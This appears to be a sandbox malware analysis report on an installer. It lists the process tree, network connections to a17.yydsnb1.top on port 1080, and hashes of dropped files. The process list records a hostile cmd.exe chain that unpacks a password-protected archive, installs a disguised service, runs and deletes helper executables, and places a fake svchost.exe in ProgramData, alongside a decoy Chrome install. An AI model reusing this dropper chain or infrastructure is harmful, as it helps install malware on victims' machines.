C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 5E8D8B1D1FBE260C26C58DBD5A8CF5C7

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\SysWOW64\cmd.exe" /c timeout /nobreak /t 7 & C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData & C:\ProgramData\Packas\scrok.exe & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & C:\ProgramData\Smart\TjNkNpAilaYvt.exe install & timeout /nobreak /t 2 & C:\ProgramData\Smart\TjNkNpAilaYvt.exe start & C:\ProgramData\Packas\scrok.exe & del C:\ProgramData\Packas\scrok.exe & C:\ProgramData\setup\setup.exe

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 7

C:\ProgramData\setup\aa.exe

C:\ProgramData\setup\aa.exe x C:\ProgramData\setup\ddd. -key 000000 -f -to C:\ProgramData

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe install

C:\Windows\SysWOW64\timeout.exe

timeout /nobreak /t 2

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

C:\ProgramData\Smart\TjNkNpAilaYvt.exe start

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

"C:\ProgramData\Smart\TjNkNpAilaYvt.exe"

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Packas\scrok.exe

C:\ProgramData\Smart\setup.exe

"C:\ProgramData\Smart\setup.exe"

C:\ProgramData\setup\setup.exe

C:\ProgramData\setup\setup.exe

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\ProgramData\NVIDIARV\svchost.exe

"C:\ProgramData\NVIDIARV\svchost.exe"

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe /installsource taggedmi /install "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regsvc

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /regserver

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping [...]

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /handoff "appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={9F0C1F44-1C50-396A-483A-08DA4896FF0B}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty" /installsource taggedmi /sessionid "{111D0A36-0076-4294-8601-703C5A42AB38}"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\133.0.6943.127_chrome_installer.exe" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\gui5409.tmp"

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\CHROME.PACKED.7Z" --verbose-logging --do-not-launch-chrome --channel=stable --system-level /installerdata="C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\gui5409.tmp"

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff65770bed8,0x7ff65770bee4,0x7ff65770bef0

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --channel=stable --system-level --verbose-logging --create-shortcuts=2 --install-level=1

C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe

"C:\Program Files (x86)\Google\Update\Install\{569FF97E-E226-4B3F-B757-11EB6B5B832B}\CR_5D2FE.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\SystemTemp\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0x244,0x248,0x24c,0x220,0x250,0x7ff65770bed8,0x7ff65770bee4,0x7ff65770bef0

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping [...]-[...]-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMTk2NzA3IiBzb3VyY2VfdXJsX2luZGV4PSIwIiB1cGRhdGVfY2hlY2tfdGltZV9tcz0iNDY4IiBkb3dubG9hZF90aW1lX21zPSIxNDI1MCIgZG93bmxvYWRlZD0iMTE4OTI5MjY0IiB0b3RhbD0iMTE4OTI5MjY0IiBpbnN0YWxsX3RpbWVfbXM9IjMwMTI1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.127 --initial-client-data=0xfc,0x100,0x104,0xa4,0x108,0x7ffa8ddefff8,0x7ffa8ddf0004,0x7ffa8ddf0010

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1720,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1976 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1948,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.127\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2296,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:13

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2932,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3124 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3152 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3648,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3660 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3708,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3712 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3268,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4696,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5464 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5472,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5532 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5516,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5500 /prefetch:1

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=2916,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3724 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3404,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3732 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3712,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4248 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=216,i,18032773278479597104,13217985034030162218,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3716 /prefetch:14

Network

Country Destination Domain Proto
US 8.8.8.8:53 a17.yydsnb1.top udp
US 8.8.8.8:53 a17.nbdsnb2.top udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
GB 216.58.201.99:443 o.pki.goog tcp
GB 216.58.201.99:443 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
GB 216.58.201.99:80 o.pki.goog tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
GB 216.58.201.99:443 o.pki.goog tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.google.com udp
NL 142.250.27.84:443 accounts.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 216.58.201.99:443 update.googleapis.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
HK 47.76.184.172:1080 a17.yydsnb1.top tcp
GB 216.58.201.99:443 update.googleapis.com tcp
GB 216.58.201.99:443 update.googleapis.com udp

Files

C:\Windows\Installer\MSICEC9.tmp

MD5 c7fbd5ee98e32a77edf1156db3fca622
SHA1 3e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256 e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA512 8691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a

C:\Windows\Installer\MSID064.tmp

MD5 ae463676775a1dd0b7a28ddb265b4065
SHA1 dff64c17885c7628b22631a2cdc9da83e417d348
SHA256 83fbfcaff3da3eb89f9aec29e6574cf15502fd670cbb2ab0c8a84451b2598b22
SHA512 e47c2db249e7a08c5d2864671fbc235e48aebecbe0b2c2334d1a4cba1b5b3037522ff89408589f3559b3a1eaf507bd338645387d55800029bb3b941d4c7744d6

C:\Config.Msi\e57ce7e.rbs

MD5 72794475117b8cda35c556f3bc48e0cf
SHA1 c79a0c0b537176d83be5ef992612c3e63dfad7ea
SHA256 86b94d163e7fdc069c56904d81a46f520063b36e804cd5b1754b553b2cf2bbac
SHA512 4a3d1b9703e417bec394aa91b17cf3d0bf22fa5e742389bbe430e0725c0938314f7adeeb27f0206f845a5bd24ea6cd67b325d19d500f6120f793f08df4902af5

C:\ProgramData\setup\aa.exe

MD5 09c448be7e7d84e6e544cc03afbb05d8
SHA1 ddc13e71a72bc49c60f89b98cbb79c2449cfa07e
SHA256 a0f127a70943b0262060498c1723c795a8e2980f1acf0c42ee8c1dae72ae54b5
SHA512 e5f7a988a999e7e34d0aa2d2a5b2fbb22689588d3def4bed4518ceed38710e3714c5614bab192b0ce6bcac5172a87ebf3b3b923e495eb7344c70bd11f4bf1c12

C:\ProgramData\setup\ddd

MD5 9bd359e3956d119811c3a6abef58e644
SHA1 9f221781f406ebcb15fc2c02d5d259116155c734
SHA256 ead38673817c84de77a4d2fe6118e6a96f863e3db38f73518007caa2af676146
SHA512 7f817794728e532da07424c621eeef161501644d137068895391505d7110f1f8ee9dc76944946e3960f84e462c66fd82ee61b619ca91a07166aed5d3434f618b

memory/1528-64-0x0000000000400000-0x0000000000510000-memory.dmp

C:\ProgramData\Packas\scrok.exe

MD5 a03b2eaa4d517fd935bb0032d444f22d
SHA1 014864aac638b7c04b4d50e6c39d7266eafda773
SHA256 6fd145b1de7d0a143fd25274544d5e3c4ecee06cf3e31631d51cae8ca3e25f01
SHA512 68a253fcdb3cd1a086fe93fa7c8a7500d6b5414bdfc0dad555973697d4fb552e09088b849573f705ca91b1652ddd4572842b82d40f5821761b3ac299e465be51

memory/1744-68-0x00007FFAAEFD0000-0x00007FFAAEFD2000-memory.dmp

memory/1744-69-0x00007FF60F8D0000-0x00007FF60FE89000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.exe

MD5 d305d506c0095df8af223ac7d91ca327
SHA1 679cb4c763c84e75ccb0fa3475bd6b7a36e81c4a
SHA256 923111c7142b3dc783a3c722b19b8a21bcb78222d7a136ac33f0ca8a29f4cb66
SHA512 94d369a4db88bff9556a1d7a7fb0188ed935c3592bae09335542c5502ec878e839177be63ac3ab4af75d4dc38a3a4f5d0fd423115ac72cf5dd710c59604db796

memory/1972-75-0x0000000000170000-0x0000000000246000-memory.dmp

C:\ProgramData\Smart\TjNkNpAilaYvt.xml

MD5 2c706293a3cfff8cc184a8e9a3b3da08
SHA1 873d7c9f51aa6cebd4ad3ae5930d1de84bb4437d
SHA256 ed28baf8be3a588d50ed246c2cd741bbd498aee74ea0675d57e0b33236e22067
SHA512 4aba3e25507ba5c29219ff51553f3616d07aeeb30f7465f9e921eea94cdcb411d1f48d1eefed647c22405df275e7f9d7506aac52202aae137391c6831463b043

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TjNkNpAilaYvt.exe.log

MD5 8005734c5c8a27f0225756ad8ab852df
SHA1 5a611231e25aa2a4dec287c01750da7fa743e981
SHA256 c7fe4d0b82bec7d44e817c76123b381269d494e2ff4a7f539ad53eb3ef5c4371
SHA512 d2c653d0c22503817c9176f93c5e330c9c0d4a244d2e254f9bc895955ef8630e5fd83b5c22459dee5f18a3e1e016a638918087106e54b2fd169b435030d7c60b

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 941ede9484eff0b69232f370231571d8
SHA1 8efb7d477425a95a7239aeead9c5ef30e86288af
SHA256 8b649c2c2f96bdd3255298b5809844b70faaa241a94c899d5658dd06606f6278
SHA512 be62a2e8bc5a1a0dd736c0ca3d6fe620fd30668c6af0e8aac423b5c8d8cbf9ca55404174fbc3223bbf9af295df95002bac7518ad0eaabb9c783b2b30885dee89

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

MD5 9fa2e5a09aa869d98881d4cda128b500
SHA1 b694b94f2f153387ea93ea73ef2fa43cdd5b5749
SHA256 0ca6331da4855f11f39e7c62ccc20bd24cee9daa79da5dac09ab897fbd1d38df
SHA512 e18e1c374778fe9ffdd71e9bf5149e2bc4d12060128500cb71d32e3d8fee32994e5c60585c2ca0b434e970ddba9a28782e27d6415f5ff37c2b825c8e09839af2

\??\Volume{50095574-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{18a162ea-5734-4694-9fd5-20be15eb218a}_OnDiskSnapshotProp

MD5 788d7ccf58473b9ffc7b0a2c9897a3c6
SHA1 2b111760471d1207c20e619e562f497760510fc8
SHA256 18fbdb39300aa849ca44ac6dade9177958ef15a8fe1fd0357fa5d0b2d154aea0
SHA512 f8fdbe60823d22c581fb11a8fa9d187563b47539febb0bc3b21a95c7d63bd5940e8889686283607a14daf90d7e20dfb7cd48ab51408f81fe70bcc8f3fa5e4354

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 71554600c12413b180f2daa5ae49537a
SHA1 c8c7ceec1cb2da07d7da9fd28207798ed68e54f1
SHA256 74ffbc95a6f4c9087318af5be2eafd0baaa7928fa90303303d9fe0adf7a1fa9b
SHA512 2a27d776539d55c7792099419fd21da639ce2c57492a39463d205e29a8a130ddc3d3456300fd8fe9bebe45d1ab1e3210734fd908c95ff332e4d65232f561a587

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 13f1c8aadf12d031b12250a853fa1bd8
SHA1 617c9f7cfc7e563009eac0e8a7521114cb4692d8
SHA256 b069e3f4f269fd1f8ce96b45f8a54273473f84286d6e24319e1661c6f42f75d5
SHA512 f3781d2922cad33e564de1076c3fc6efd392623bbc8197d8795ce9d77bcf5bea743023fbde79f19dd1c26771bcb7b4c12c4f4420087839735848288eb87f5093

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 9202d93f69096e5d559578eb1d88079a
SHA1 2a0a46d539bcfe7f3e91ba2a731cbfc897a47df4
SHA256 f69b03baced570e94107309d45b4b7363ecb9aaa2c77257a770a211b09f688ad
SHA512 056449f47961a7d942b0f667503776ebc80972f7fd17472dfbd4eb96875456b13f0b8e9b71557c55279c6560cb1e95489f5f1c37c4e83c2dc573c5df903f0ce2

C:\ProgramData\Smart\TjNkNpAilaYvt.wrapper.log

MD5 1cfa188d5881a50f7e16cc80bddb05cc
SHA1 c283d3a262c43f2da942a17fd196d597fc1761e4
SHA256 da3eef6603ba90720277bb634046c120584edbef82283d7fd6d430bed761ebf8
SHA512 8bf5de87976a37479f7ace27bdd2ec9f3feb0e69c0e802d89f8aa0ed3c5beacc25c3e3b1ecb84668d636ed3c35bf57d1b959b8b02fc8a2c81fc6bb62571ca092

C:\ProgramData\Smart\setup.exe

MD5 118a9a9f6280e177fdac16989b8aa1a5
SHA1 fc37316439372be17a982d02cd0d294f7aaca751
SHA256 b995e6a0299f2465fd5881157aab1c6c9753c8e459efd661b9cd1e83be7e53f6
SHA512 14c731e7f7e9736f39d6c79a98bf1a3264da9dc76bab4faca82ec64f276f3d39c9bc4638991e30a06f52bf6204619f5da8c3168d11afe058e0c1d21a89d42878

memory/4776-114-0x00007FF60F8D0000-0x00007FF60FE89000-memory.dmp

memory/3780-118-0x0000000000400000-0x0000000000BA0000-memory.dmp

memory/3780-117-0x0000000000F00000-0x0000000000F01000-memory.dmp

C:\ProgramData\setup\setup.exe

MD5 4a94844260d6a08828d781d488cef61d
SHA1 de8169fdb5ab8a120df577d92eb25a2767431738
SHA256 46d7a8abe3bb9d7302529246cd8ee6e7d0360d1045fe92662cc7580e72ef5132
SHA512 82549c1e525a90003fb0174ebba2bc3b4f58706ef9fd5e6ee07d489ab536ef286e408db6c15a52b039d3f59c09bd55e35d045def79007da5d414d5d589d34f4f

C:\ProgramData\NVIDIARV\svchost.exe

MD5 4ce1a842d3d770f6fa4b4167542408b2
SHA1 43b0c03b176318ce2551d3dfc2c18e18f53c2240
SHA256 ba51980ef9681d849c9331e891cc411c1687d3c011f0acc01da9f4ef640764b6
SHA512 a28f0659af75da93f479359212dc4ffb9440f171cf89b19de929b7a8015b5e087ea53ab979dd6815597865538c79b1e3354e987940da88da4dfcf16bdf1f4337

memory/4680-219-0x0000000000400000-0x000000000090B000-memory.dmp

memory/4680-221-0x0000000010000000-0x000000001002D000-memory.dmp

memory/416-209-0x0000000010000000-0x000000001002D000-memory.dmp

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_zh-CN.dll

MD5 ca52cc49599bb6bda28c38aea1f9ec4e
SHA1 494f166b530444f39bca27e2b9e10f27e34fc98a
SHA256 f9f144aa2dc0de21b24c93f498a9b4a946b7da42819a776b3283a0bcae18544b
SHA512 05e2d5711eef8f57737b2512de2e73744f17e0a34de0bfd2a06c9cc60a08ebadbafe38e30b66a2ede7fa61d5b9571adddcfbd7e1cafcee1ab2168a563d2d3f0d

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdate.dll

MD5 dae72b4b8bcf62780d63b9cbb5b36b35
SHA1 1d9b764661cfe4ee0f0388ff75fd0f6866a9cd89
SHA256 b0ca6700e7a4ea667d91bcf3338699f28649c2e0a3c0d8b4f2d146ab7c843ab6
SHA512 402c00cab6dac8981e200b6b8b4263038d76afe47c473d5f2abf0406222b32fff727b495c6b754d207af2778288203ce0774a6200b3e580e90299d08ce0c098f

C:\Windows\SystemTemp\GUMFD1E.tmp\GoogleUpdate.exe

MD5 cdf152e23a8cbf68dbe3f419701244fc
SHA1 cb850d3675da418131d90ab01320e4e8842228d7
SHA256 84eaf43f33d95da9ab310fc36dc3cfe53823d2220946f021f18cf3f729b8d64e
SHA512 863e1da5bc779fa02cf08587c4de5f04c56e02902c5c4f92a06f2e631380ecabcc98e35d52609f764727e41b965c0786d24ea23fc4b9776d24d9f13e0d8ae0c2

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_de.dll

MD5 96d92500b9a763f4b862c511c17e0a47
SHA1 2fd441eb8685d15e14fa6405e82359adea3e7148
SHA256 58829d135ff41e574ed5fc5e0421e4aa204267b02ca3ffaf08d8efb0a70fdd4c
SHA512 a1014584f1f278160d579848fa188f627676aee819e9395517490b00e273db6f583d7ddd31af6e35c9d251021df7fb26c88512aaa1c865c2ee3ba60c0a2db49a

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_es.dll

MD5 dae64d49ee97339b7327b52c9f720848
SHA1 15f159c4808f9e4fe6a2f1a4a19faa5d84ac630b
SHA256 e76400e62ae0ab31565e50b05d1001b775a91aa487a54dc90e53c0e103c717c2
SHA512 9ae72e5a658aa0e1fb261d62ccef474cd42d9bec2b4a50f71925d131ffea22b8f60fb961772587ce71cb30a32da3b7986e7483ecea960a509e0450d3983c84b0

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_en-GB.dll

MD5 f82ccf890c3ae14bfd7a263d07276e60
SHA1 6a915d6eb8c99d065e36a721d721d556b74bb377
SHA256 6b07a4fd3039541e30c68a8c31c371cda2cea480787f95e0ddbca3cc2fbff0cc
SHA512 4cbf9e6728e08de8d61f34b17bb20d92b6a699969edb9afa013fe962c8fd39238288adcd826134c9bca459904d8574a804c519daac6b301e0d38f68722c0359e

C:\Windows\SystemTemp\GUMFD1E.tmp\goopdateres_en.dll

